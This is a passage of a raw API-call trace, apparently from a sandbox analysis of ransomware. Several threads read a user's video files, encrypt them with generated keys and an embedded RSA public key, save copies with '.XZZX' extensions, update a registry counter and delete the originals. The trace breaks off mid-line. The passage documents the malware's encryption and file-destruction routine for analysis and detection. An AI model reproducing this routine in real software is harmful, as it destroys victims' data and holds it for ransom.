[0133.703] WriteFile (in: hFile=0x6f4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x424e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x424e438*=0x5, lpOverlapped=0x0) returned 1 [0133.703] SetFilePointer (in: hFile=0x6f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x15b56 [0133.703] SetErrorMode (uMode=0x1) returned 0x1 [0133.703] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0133.703] OutputDebugStringW (lpOutputString="end") [0133.704] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x08\x86Ê\x03`Õ$\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x424dbf4, pcbBinary=0x424d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x424dbf4, pcbBinary=0x424d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0133.704] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x424dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x424d3dc, pcbStructInfo=0x424d3d8 | out: pvStructInfo=0x424d3dc, pcbStructInfo=0x424d3d8) returned 1 [0133.704] CryptAcquireContextW (in: phProv=0x424d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x424d3e4*=0x3cf87a8) returned 1 [0133.704] CryptImportPublicKeyInfo (in: hCryptProv=0x3cf87a8, dwCertEncodingType=0x1, pInfo=0x3cf1510*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cf1540*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cf1548*, PublicKey.cUnusedBits=0x0), phKey=0x424d3ec | out: phKey=0x424d3ec*=0x3d11498) returned 1 [0133.704] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0133.705] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0133.705] CryptEncrypt (in: hKey=0x3d11498, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x424d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x424d3f0*=0x80) returned 1 [0133.705] CryptEncrypt (in: hKey=0x3d11498, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cf8830*, pdwDataLen=0x424d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cf8830*, pdwDataLen=0x424d3e8*=0x80) returned 1 [0133.705] WriteFile (in: hFile=0x6f4, lpBuffer=0x3cf8830*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x424e438, lpOverlapped=0x0 | out: lpBuffer=0x3cf8830*, lpNumberOfBytesWritten=0x424e438*=0x80, lpOverlapped=0x0) returned 1 [0133.705] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0133.705] WriteFile (in: hFile=0x6f4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x424e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x424e438*=0x5, lpOverlapped=0x0) returned 1 [0133.705] GetUserNameW (in: lpBuffer=0x424e1f8, pcbBuffer=0x424dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x424dfe0) returned 1 [0133.745] wsprintfW (in: param_1=0x424dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0133.745] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x424dfe4 | out: phkResult=0x424dfe4*=0x6f8) returned 0x0 [0133.745] RegQueryValueExW (in: hKey=0x6f8, lpValueName="E1010314", lpReserved=0x0, lpType=0x424dfd8, lpData=0x424dfec, lpcbData=0x424dfdc*=0x4 | out: lpType=0x424dfd8*=0x4, lpData=0x424dfec*=0xc1, lpcbData=0x424dfdc*=0x4) returned 0x0 [0133.745] RegCloseKey (hKey=0x6f8) returned 0x0 [0133.745] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x424dfe8 | out: phkResult=0x424dfe8*=0x6f8) returned 0x0 [0133.745] RegSetValueExW (in: hKey=0x6f8, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x424dfec*=0xc2, cbData=0x4 | out: lpData=0x424dfec*=0xc2) returned 0x0 [0133.745] RegCloseKey (hKey=0x6f8) returned 0x0 [0133.745] VirtualFree (lpAddress=0x40f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.745] VirtualFree (lpAddress=0x4350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.746] CloseHandle (hObject=0x6f4) returned 1 [0133.747] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0133.748] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0133.748] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\fJw1HV.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z-_06k\\wpc5n64xvm\\fjw1hv.flv")) returned 1 [0133.749] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\fJw1HV.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z-_06k\\wpc5n64xvm\\fjw1hv.flv")) returned 0 Thread: id = 458 os_tid = 0xa78 [0133.705] lstrcpyA (in: lpString1=0x434fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0133.705] lstrcpyW (in: lpString1=0x434f460, lpString2="Moq53i08kUE_j1CIf3Zg.avi" | out: lpString1="Moq53i08kUE_j1CIf3Zg.avi") returned="Moq53i08kUE_j1CIf3Zg.avi" [0133.705] lstrcpyW (in: lpString1=0x434e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" [0133.705] SetErrorMode (uMode=0x1) returned 0x1 [0133.705] lstrcpyW (in: lpString1=0x434f860, lpString2="Moq53i08kUE_j1CIf3Zg.avi" | out: lpString1="Moq53i08kUE_j1CIf3Zg.avi") returned="Moq53i08kUE_j1CIf3Zg.avi" [0133.705] CoCreateGuid (in: pguid=0x434e440 | out: pguid=0x434e440*(Data1=0xc13f2386, Data2=0x9b34, Data3=0x4561, Data4=([0]=0x85, [1]=0x16, [2]=0x8e, [3]=0x16, [4]=0x42, [5]=0x4d, [6]=0xfc, [7]=0xcb))) returned 0x0 [0133.705] wsprintfW (in: param_1=0x434ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\Moq53i08kUE_j1CIf3Zg.avi") returned 83 [0133.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x434fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0133.706] wsprintfW (in: param_1=0x434e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\7B5559382A0FD2B4C13F23862E44B6FC.XZZX") returned 96 [0133.706] StrStrW (lpFirst="Moq53i08kUE_j1CIf3Zg.avi", lpSrch="XZZX") returned 0x0 [0133.706] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\Moq53i08kUE_j1CIf3Zg.avi", dwFileAttributes=0x20) returned 1 [0133.706] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\Moq53i08kUE_j1CIf3Zg.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z-_06k\\wpc5n64xvm\\moq53i08kue_j1cif3zg.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6f8 [0133.706] ReadFile (in: hFile=0x6f8, lpBuffer=0x3cffe68, nNumberOfBytesToRead=0x2136, lpNumberOfBytesRead=0x434e418, lpOverlapped=0x0 | out: lpBuffer=0x3cffe68*, lpNumberOfBytesRead=0x434e418*=0x2136, lpOverlapped=0x0) returned 1 [0133.710] CloseHandle (hObject=0x6f8) returned 1 [0133.710] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0133.710] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40e0000 [0133.711] SetErrorMode (uMode=0x1) returned 0x1 [0133.711] lstrcpyW (in: lpString1=0x434e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0133.711] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cf88b8) returned 1 [0133.713] CryptGenKey (in: hProv=0x3cf88b8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3d11518) returned 1 [0134.084] CryptExportKey (in: hKey=0x3d11518, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x434e41c | out: pbData=0x0*, pdwDataLen=0x434e41c*=0x94) returned 1 [0134.084] CryptExportKey (in: hKey=0x3d11518, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40e0000, pdwDataLen=0x434e41c | out: pbData=0x40e0000*, pdwDataLen=0x434e41c*=0x94) returned 1 [0134.084] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0134.084] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0134.084] CryptDestroyKey (hKey=0x3d11518) returned 1 [0134.084] CryptReleaseContext (hProv=0x3cf8940, dwFlags=0x0) returned 0 [0134.084] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\7B5559382A0FD2B4C13F23862E44B6FC.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z-_06k\\wpc5n64xvm\\7b5559382a0fd2b4c13f23862e44b6fc.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x714 [0134.119] WriteFile (in: hFile=0x714, lpBuffer=0x3cffe68*, nNumberOfBytesToWrite=0x2136, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x3cffe68*, lpNumberOfBytesWritten=0x434e438*=0x2136, lpOverlapped=0x0) returned 1 [0134.120] SetFilePointer (in: hFile=0x714, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2136 [0134.120] WriteFile (in: hFile=0x714, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0134.120] SetFilePointer (in: hFile=0x714, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x213b [0134.120] WriteFile (in: hFile=0x714, lpBuffer=0x434f860*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x434f860*, lpNumberOfBytesWritten=0x434e438*=0x30, lpOverlapped=0x0) returned 1 [0134.120] SetFilePointer (in: hFile=0x714, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x216b [0134.121] WriteFile (in: hFile=0x714, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0134.121] SetFilePointer (in: hFile=0x714, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2170 [0134.121] SetErrorMode (uMode=0x1) returned 0x1 [0134.121] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0134.121] OutputDebugStringW (lpOutputString="end") [0134.121] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----vX\x8aÊ\x03`Õ4\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0134.121] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x434dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8 | out: pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8) returned 1 [0134.121] CryptAcquireContextW (in: phProv=0x434d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x434d3e4*=0x3cf89c8) returned 1 [0134.122] CryptImportPublicKeyInfo (in: hCryptProv=0x3cf89c8, dwCertEncodingType=0x1, pInfo=0x3cf1fa0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cf1fd0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cf1fd8*, PublicKey.cUnusedBits=0x0), phKey=0x434d3ec | out: phKey=0x434d3ec*=0x3d11518) returned 1 [0134.122] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0134.122] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0134.122] CryptEncrypt (in: hKey=0x3d11518, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x434d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x434d3f0*=0x80) returned 1 [0134.122] CryptEncrypt (in: hKey=0x3d11518, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cf8a50*, pdwDataLen=0x434d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cf8a50*, pdwDataLen=0x434d3e8*=0x80) returned 1 [0134.123] WriteFile (in: hFile=0x714, lpBuffer=0x3cf8a50*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x3cf8a50*, lpNumberOfBytesWritten=0x434e438*=0x80, lpOverlapped=0x0) returned 1 [0134.123] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0134.123] WriteFile (in: hFile=0x714, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0134.123] GetUserNameW (in: lpBuffer=0x434e1f8, pcbBuffer=0x434dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x434dfe0) returned 1 [0134.123] wsprintfW (in: param_1=0x434dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0134.123] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe4 | out: phkResult=0x434dfe4*=0x718) returned 0x0 [0134.123] RegQueryValueExW (in: hKey=0x718, lpValueName="E1010314", lpReserved=0x0, lpType=0x434dfd8, lpData=0x434dfec, lpcbData=0x434dfdc*=0x4 | out: lpType=0x434dfd8*=0x4, lpData=0x434dfec*=0xc2, lpcbData=0x434dfdc*=0x4) returned 0x0 [0134.123] RegCloseKey (hKey=0x718) returned 0x0 [0134.123] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe8 | out: phkResult=0x434dfe8*=0x718) returned 0x0 [0134.123] RegSetValueExW (in: hKey=0x718, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x434dfec*=0xc3, cbData=0x4 | out: lpData=0x434dfec*=0xc3) returned 0x0 [0134.123] RegCloseKey (hKey=0x718) returned 0x0 [0134.123] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.124] VirtualFree (lpAddress=0x40e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.124] CloseHandle (hObject=0x714) returned 1 [0134.125] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0134.125] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0134.125] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\Moq53i08kUE_j1CIf3Zg.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z-_06k\\wpc5n64xvm\\moq53i08kue_j1cif3zg.avi")) returned 1 [0134.126] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\Moq53i08kUE_j1CIf3Zg.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z-_06k\\wpc5n64xvm\\moq53i08kue_j1cif3zg.avi")) returned 0 Thread: id = 459 os_tid = 0xa7c [0133.838] lstrcpyA (in: lpString1=0x424fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0133.838] lstrcpyW (in: lpString1=0x424f460, lpString2="v9PzrbehuH3KFc.mp4" | out: lpString1="v9PzrbehuH3KFc.mp4") returned="v9PzrbehuH3KFc.mp4" [0133.838] lstrcpyW (in: lpString1=0x424e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" [0133.838] SetErrorMode (uMode=0x1) returned 0x1 [0133.838] lstrcpyW (in: lpString1=0x424f860, lpString2="v9PzrbehuH3KFc.mp4" | out: lpString1="v9PzrbehuH3KFc.mp4") returned="v9PzrbehuH3KFc.mp4" [0133.838] CoCreateGuid (in: pguid=0x424e440 | out: pguid=0x424e440*(Data1=0x42879611, Data2=0x2f32, Data3=0x4830, Data4=([0]=0xa8, [1]=0xf1, [2]=0x54, [3]=0xd0, [4]=0xd3, [5]=0xa1, [6]=0xf0, [7]=0x85))) returned 0x0 [0133.838] wsprintfW (in: param_1=0x424ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\v9PzrbehuH3KFc.mp4") returned 77 [0133.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x424fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0133.838] wsprintfW (in: param_1=0x424e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\E3086E520D4EE960428796111173CDA8.XZZX") returned 96 [0133.838] StrStrW (lpFirst="v9PzrbehuH3KFc.mp4", lpSrch="XZZX") returned 0x0 [0133.838] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\v9PzrbehuH3KFc.mp4", dwFileAttributes=0x20) returned 1 [0133.838] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\v9PzrbehuH3KFc.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z-_06k\\wpc5n64xvm\\v9pzrbehuh3kfc.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x700 [0133.839] ReadFile (in: hFile=0x700, lpBuffer=0x4378cf8, nNumberOfBytesToRead=0x22f9, lpNumberOfBytesRead=0x424e418, lpOverlapped=0x0 | out: lpBuffer=0x4378cf8*, lpNumberOfBytesRead=0x424e418*=0x22f9, lpOverlapped=0x0) returned 1 [0133.840] CloseHandle (hObject=0x700) returned 1 [0133.840] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x40f0000 [0133.840] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x4350000 [0133.840] SetErrorMode (uMode=0x1) returned 0x1 [0133.840] lstrcpyW (in: lpString1=0x424e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0133.840] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cf8940) returned 1 [0133.842] CryptGenKey (in: hProv=0x3cf8940, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3d11598) returned 1 [0134.191] CryptExportKey (in: hKey=0x3d11598, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x424e41c | out: pbData=0x0*, pdwDataLen=0x424e41c*=0x94) returned 1 [0134.191] CryptExportKey (in: hKey=0x3d11598, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x4350000, pdwDataLen=0x424e41c | out: pbData=0x4350000*, pdwDataLen=0x424e41c*=0x94) returned 1 [0134.191] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0134.191] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0134.191] CryptDestroyKey (hKey=0x3d11598) returned 1 [0134.191] CryptReleaseContext (hProv=0x3cf8940, dwFlags=0x0) returned 0 [0134.191] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\E3086E520D4EE960428796111173CDA8.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z-_06k\\wpc5n64xvm\\e3086e520d4ee960428796111173cda8.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x708 [0134.192] WriteFile (in: hFile=0x708, lpBuffer=0x4378cf8*, nNumberOfBytesToWrite=0x22f9, lpNumberOfBytesWritten=0x424e438, lpOverlapped=0x0 | out: lpBuffer=0x4378cf8*, 